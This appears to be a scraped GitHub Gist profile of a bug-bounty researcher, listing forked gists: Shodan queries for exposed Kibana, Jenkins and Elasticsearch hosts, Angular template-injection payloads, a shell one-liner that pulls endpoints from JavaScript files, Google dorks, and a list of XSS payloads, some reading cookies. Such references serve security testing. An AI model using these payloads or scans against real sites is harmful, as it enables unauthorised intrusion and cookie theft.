Security Researcher

PushkraJ PushkraJ99

Security Researcher

🥷🏻 Upgrade Tools For Fun

PushkraJ99 / shodanRecon

Created September 21, 2023 06:59 — forked from ShubhamPy/shodanRecon

	org: org_name
	kibana content-length:217
	org:”Amazon” ssl:”target”
	ssl:”target”
	html:”Dashboard Jenkins” http.component:”jenkins”
	http.title:”302 Found”
	http.component%3A”java”
	https://www.shodan.io/host/ip#9200
	https://www.shodan.io/host/ip
	X-Redirect-By: WordPress ssl:”name”

PushkraJ99 / AngularTI.md

Created December 18, 2023 14:06 — forked from mccabe615/AngularTI.md

Angular Template Injection Payloads

{{7*7}}

'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';

PushkraJ99 / JavascriptRecon.md

Created January 15, 2024 17:55 — forked from fuckup1337/JavascriptRecon.md

My Javascript Recon Process - BugBounty

Description

This is a simple guide to perform javascript recon in the bugbounty

The first step is to collect possibly several javascript files (more files = more paths,parameters -> more vulns)

PushkraJ99 / ejs.sh

Created January 15, 2024 18:02 — forked from gwen001/ejs.sh

onliner to extract endpoints from JS files of a given host

	curl -L -k -s https://www.example.com \| tac \| sed "s#\\\/#\/#g" \| egrep -o "src['\"]?\s[=:]\s['\"]?[^'\"]+.js[^'\"> ]" \| awk -F '//' '{if(length($2))print "https://"$2}' \| sort -fu \| xargs -I '%' sh -c "curl -k -s \"%\" \| sed \"s/[;}\)>]/\n/g\" \| grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\|(\.(get\|post\|ajax\|load)\s\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\"" \| awk -F "['\"]" '{print $2}' \| sort -fu

	# using linkfinder
	function ejs() {
	URL=$1;
	curl -Lks $URL \| tac \| sed "s#\\\/#\/#g" \| egrep -o "src['\"]?\s[=:]\s['\"]?[^'\"]+.js[^'\"> ]*" \| sed -r "s/^src['\"]?[=:]['\"]//g" \| awk -v url=$URL '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' \| sort -fu \| xargs -I '%' sh -c "echo \"\n##### %\";wget --no-check-certificate --quiet \"%\"; basename \"%\" \| xargs -I \"#\" sh -c 'linkfinder.py -o cli -i #'"
	}

	# with file download (the new best one):
	# but there is a bug if you don't provide a root url

PushkraJ99 / dorks.txt

Created January 20, 2024 19:09 — forked from abdelhady360/dorks.txt

List of Google Dorks for sites that have responsible disclosure program / bug bounty program

	inurl /bug bounty
	inurl : / security
	inurl:security.txt
	inurl:security "reward"
	inurl : /responsible disclosure
	inurl : /responsible-disclosure/ reward
	inurl : / responsible-disclosure/ swag
	inurl : / responsible-disclosure/ bounty
	inurl:'/responsible disclosure' hoodie
	responsible disclosure swag r=h:com

PushkraJ99 / xss1500.txt

Created August 15, 2024 11:05 — forked from MU2324/xss1500.txt

	#<script>alert(1)</script>
	1%22onfocus=%27window.alert%28document.cookie%29%27%20autofocus=
	"><form onformdata%3Dwindow.confirm(cookie)><button>XSS here<!--
	#javascript:alert(2);
	"><svg onload=alert(1)>
	[email protected]%27\%22%3E%3Csvg/onload=alert(/xss/)%3E
	[email protected]%2527%5C%2522%253E%253Csvg%2Fonload%3Dalert%28%2Fxss%2F%29%253E
	//?aspxerrorpath=<script>alert(1)</script>
	嘼嘾img%20src%3Dx%20onerror%3Dprompt%28document.domain%29%3B%3E
	alert##<script>prompt(1234)</script>